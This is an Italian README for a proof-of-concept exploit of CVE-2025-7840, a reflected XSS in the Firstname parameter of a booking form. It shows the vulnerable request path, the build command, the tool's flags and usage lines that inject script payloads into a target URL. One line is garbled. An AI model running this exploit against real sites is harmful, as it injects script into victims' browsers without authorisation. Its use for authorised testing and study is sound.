
Exploit proof‑of‑concept per CVE‑2025‑7840 che inietta payload maliziosi nel parametro Firstname di un modulo di prenotazione per attivare XSS
Autore: Byte Reaper (@ByteReaper0)
Exploit proof‑of‑concept per CVE-2025-7840, che prende di mira un endpoint di un'applicazione web vulnerabile che non sanifica l'input utente sul parametro Firstname di un modulo di prenotazione. Creando una richiesta GET a:
/index.php?page=reserve&Firstname=<payload>&Lastname=test
un attaccante può iniettare ed eseguire JavaScript arbitrario nel browser della vittima quando la risposta viene renderizzata.
-b-c-v)libcurlargparse per CCompilare l'exploit:
gcc -o exploit exploit.c argparse.c -lcurl
sudo ./exploit -u <TARGET_URL> [options]
| Flag | Descrizione |
|---|---|
-u URL | URL di base del target (es. http://victim.local) |
-b PAYLOAD | Payload XSS personalizzato da iniettare |
-c FILE | File jar dei cookie da usare per la gestione della sessione |
-v | Modalità verbose (mostra dettagli richiesta/risposta) |
Eseguire i payload predefiniti contro un target:
sudo ./exploit -u http://victim.local
Usare un payload personalizzato:
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
Includere cookie di sessione e output verbose:
sudo ./exploit -u http://victim.local -c cookies.txt -v
Questo codice è fornito solo a scopo educativo e di test. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicita autorizzazione a testare è illegale e non etico.
MIT